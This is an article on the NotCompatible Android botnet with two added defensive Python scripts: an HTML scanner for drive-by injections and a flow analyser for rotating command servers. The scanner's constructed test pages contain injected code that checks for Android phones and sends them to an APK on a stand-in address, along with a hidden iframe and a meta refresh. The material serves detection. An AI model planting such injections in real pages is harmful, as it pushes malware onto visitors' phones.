Mobile Malware Campaign Affected More Than 4 Million Android Phones
Viruses, other malicious software and botnets have plagued PC users for years. Smartphones once seemed safe from such attacks; they no longer are.
Lookout, a San Francisco mobile security company, researched the malicious activity aimed at smartphones and identified a mobile malware campaign targeting Android users that has affected between four million and 4.5 million people in the United States since 2013.
Lookout has been tracking the campaign — called NotCompatible — for over two years and reports that it has seen increasingly sophisticated versions of the malware. According to the company, more than four million people in the United States have encountered it since January 2013.
Attackers use several techniques to infect smartphones. One is to compromise legitimate websites: when a user visits such a site from a phone, the page pushes malicious code onto the device without the user asking for it. This is called a drive-by download. On Android the payload arrives as an app package (APK) that still has to be installed, so the attacker relies on the victim accepting the install prompt, which only succeeds on devices that allow installation from unknown sources.
In another technique, attackers send spam from hijacked email accounts; Lookout researchers report that this alone produced more than 20,000 infections a day. A third approach tricks users into installing the malicious code by presenting it in email as a security patch.
In some cases the spam sent to Android users advertised weight-loss products alongside the malware links.
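The drive-by vector described above depends on a legitimate site being altered so that it pushes an app package at Android visitors. What follows is an added example, not Lookout's code and not the malware itself: a small Python scanner for the kinds of injected markup such a compromise leaves behind (hidden iframes, meta refreshes and user-agent-sniffing JavaScript redirects that point at a .apk file). The sample pages and the 203.0.113.10 address are constructed for the example.

```python
import re
from html.parser import HTMLParser

# A URL whose path ends in .apk, optionally followed by a query or fragment.
APK_RE = re.compile(r"\.apk(?:[?#]|$)", re.IGNORECASE)
# Inline styles used to keep an injected frame out of sight.
HIDDEN_STYLE_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.IGNORECASE)
# Script text that reads the user agent and mentions Android shortly after.
UA_SNIFF_RE = re.compile(r"navigator\.(?:userAgent|platform)[\s\S]{0,200}?android", re.IGNORECASE)
# A JavaScript redirect whose destination is a .apk file.
JS_REDIRECT_RE = re.compile(
    r"(?:location(?:\.href)?\s*=|location\.(?:replace|assign)\s*\()"
    r"\s*['\"](?P<url>[^'\"]*\.apk[^'\"]*)['\"]",
    re.IGNORECASE,
)


class DriveByScanner(HTMLParser):
    """Collects indicators of an injected Android drive-by download."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._script = None  # buffer for the <script> body being read

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            src = a.get("src", "")
            hidden = bool(
                a.get("width", "").strip() in ("0", "1")
                or a.get("height", "").strip() in ("0", "1")
                or HIDDEN_STYLE_RE.search(a.get("style", ""))
            )
            if hidden or APK_RE.search(src):
                self.findings.append({"kind": "iframe", "target": src, "ua_sniff": False})
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            content = a.get("content", "")
            if APK_RE.search(content):
                self.findings.append({"kind": "meta-refresh", "target": content, "ua_sniff": False})
        elif tag == "script":
            self._script = []

    def handle_data(self, data):
        if self._script is not None:
            self._script.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script is not None:
            body = "".join(self._script)
            self._script = None
            m = JS_REDIRECT_RE.search(body)
            if m:
                self.findings.append({
                    "kind": "js-redirect",
                    "target": m.group("url"),
                    "ua_sniff": bool(UA_SNIFF_RE.search(body)),
                })


def scan_page(html):
    """Return every indicator found in the page, in document order."""
    parser = DriveByScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


def is_compromised(html):
    """True when at least one indicator points at an APK download."""
    return any(APK_RE.search(f["target"]) for f in scan_page(html))


# Constructed sample: a news page with an injected UA-sniffing redirect and a hidden 1x1 iframe.
COMPROMISED_PAGE = """<html><head><title>Local News</title>
<script>
if (navigator.userAgent.indexOf("Android") !== -1) {
  location.href = "http://203.0.113.10/Update.apk";
}
</script>
</head><body><h1>Today's headlines</h1>
<iframe src="http://203.0.113.10/landing.php" width="1" height="1" style="display:none"></iframe>
</body></html>"""

# Constructed sample: an injected meta refresh straight to the package.
REDIRECT_PAGE = """<html><head>
<meta http-equiv="refresh" content="0; url=http://203.0.113.10/Update.apk">
</head><body>Loading...</body></html>"""

# Constructed sample: a clean page that also reads the user agent (for analytics)
# and embeds a visible video frame; nothing here should be flagged.
CLEAN_PAGE = """<html><head><title>Local News</title>
<script>var isMobile = /Android|iPhone/.test(navigator.userAgent); track(isMobile);</script>
</head><body>
<iframe src="https://video.example/embed/123" width="560" height="315"></iframe>
<a href="/downloads/notes.pdf">Notes</a>
</body></html>"""

if __name__ == "__main__":
    for name, page in (("compromised", COMPROMISED_PAGE), ("redirect", REDIRECT_PAGE), ("clean", CLEAN_PAGE)):
        print(name, is_compromised(page), scan_page(page))
```

A hidden iframe with no APK target is reported for review but does not on its own mark the page as compromised; the verdict requires an indicator that actually points at a package. The scanner works on saved HTML only, so it will not see redirects that are generated after the page loads.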
So what can the attacker do once a smartphone is infected? The phone becomes part of a botnet, a network of infected devices under the attacker's control. The attacker can then carry out malicious activity using the device and its bandwidth.
Lookout reports that the NotCompatible operators rented out control of the infected devices to paying customers. Those customers used the devices to send spam, to buy up event tickets in bulk from Ticketmaster, Live Nation, EventShopper and Craigslist, and to crack WordPress accounts.
A botnet typically has three kinds of participants. At the lowest layer are the infected devices, the bots. They connect to the Command and Control (C&C) server, which sends commands to the bots; in peer-to-peer designs the bots also connect to one another.
The C&C server in turn takes its orders from the bot master, the operator who controls the botnet.
Lookout says that NotCompatible is now in its third iteration and is growing more complex: the operators have added encryption between the C&C server and infected hosts, which keeps defenders from reading the commands and defeats content-based network signatures.
Moreover, modern botnets do not depend on a single static C&C server. The controller role moves among the infected hosts: one host serves as C&C for a while, then another takes over and directs the botnet. Blocking or seizing one address therefore does not take the network down.
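Seen from the defender's side, a moving controller means that an address collected from one capture goes stale quickly. The following is an added example, not Lookout's analysis and not NotCompatible traffic: a Python script that reads constructed flow records, finds per time window the host contacted by many distinct peers (a fan-in heuristic for the controller role), and shows how a blocklist built from the first window misses the later controllers. The 10.0.0.x and 198.51.100.5 addresses and the 600-second rotation are assumptions made for the example.

```python
from collections import defaultdict

# Constructed flow records (not real traffic): epoch seconds, source host, destination host.
# Six bots on 10.0.0.1-6; the host every other bot checks in with changes each window.
# 198.51.100.5 stands in for an ordinary web server the bots also talk to.
SAMPLE_FLOWS = """\
1000,10.0.0.2,10.0.0.1
1004,10.0.0.3,10.0.0.1
1009,10.0.0.4,10.0.0.1
1013,10.0.0.5,10.0.0.1
1020,10.0.0.6,10.0.0.1
1030,10.0.0.2,198.51.100.5
1700,10.0.0.1,10.0.0.4
1702,10.0.0.2,10.0.0.4
1708,10.0.0.3,10.0.0.4
1711,10.0.0.5,10.0.0.4
1715,10.0.0.6,10.0.0.4
1720,10.0.0.3,198.51.100.5
2400,10.0.0.1,10.0.0.6
2403,10.0.0.2,10.0.0.6
2405,10.0.0.3,10.0.0.6
2412,10.0.0.4,10.0.0.6
2419,10.0.0.5,10.0.0.6
2430,10.0.0.6,198.51.100.5
"""


def parse_flows(text):
    """Parse 'timestamp,src,dst' lines into (int, str, str) tuples; blank and # lines are skipped."""
    flows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst = line.split(",")
        flows.append((int(ts), src.strip(), dst.strip()))
    return flows


def fan_in_by_window(flows, window):
    """Map window start -> destination -> set of distinct sources seen in that window."""
    table = defaultdict(lambda: defaultdict(set))
    for ts, src, dst in flows:
        table[ts - ts % window][dst].add(src)
    return table


def cc_candidates(flows, window=600, min_fan_in=3):
    """Per window, hosts contacted by at least min_fan_in distinct peers: (start, host, fan_in)."""
    table = fan_in_by_window(flows, window)
    out = []
    for start in sorted(table):
        for dst, srcs in sorted(table[start].items()):
            if len(srcs) >= min_fan_in:
                out.append((start, dst, len(srcs)))
    return out


def rotating_controllers(candidates):
    """Distinct hosts that played the controller role, in order of first appearance."""
    seen = []
    for _, host, _ in candidates:
        if host not in seen:
            seen.append(host)
    return seen


def blocklist_gap(candidates, blocked):
    """Windows whose controller is not on the blocklist, i.e. the bots still had a reachable C&C."""
    return [(start, host) for start, host, _ in candidates if host not in blocked]


if __name__ == "__main__":
    cands = cc_candidates(parse_flows(SAMPLE_FLOWS))
    for start, host, fan_in in cands:
        print(f"window {start}: {host} contacted by {fan_in} peers")
    print("controllers seen:", rotating_controllers(cands))
    # A blocklist taken from the first window alone leaves the later controllers untouched.
    print("uncovered windows:", blocklist_gap(cands, {cands[0][1]}))
```

The fan-in threshold is deliberately low for the six-host sample; on real flow data it has to be set against the normal fan-in of the network, and ordinary services (mail relays, update servers) need an allowlist so they are not reported as controllers.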
Lookout notes that the botnet's traffic travels over the victims' mobile data plans, so the victims pay for it, and that infected phones suffer battery drain as well.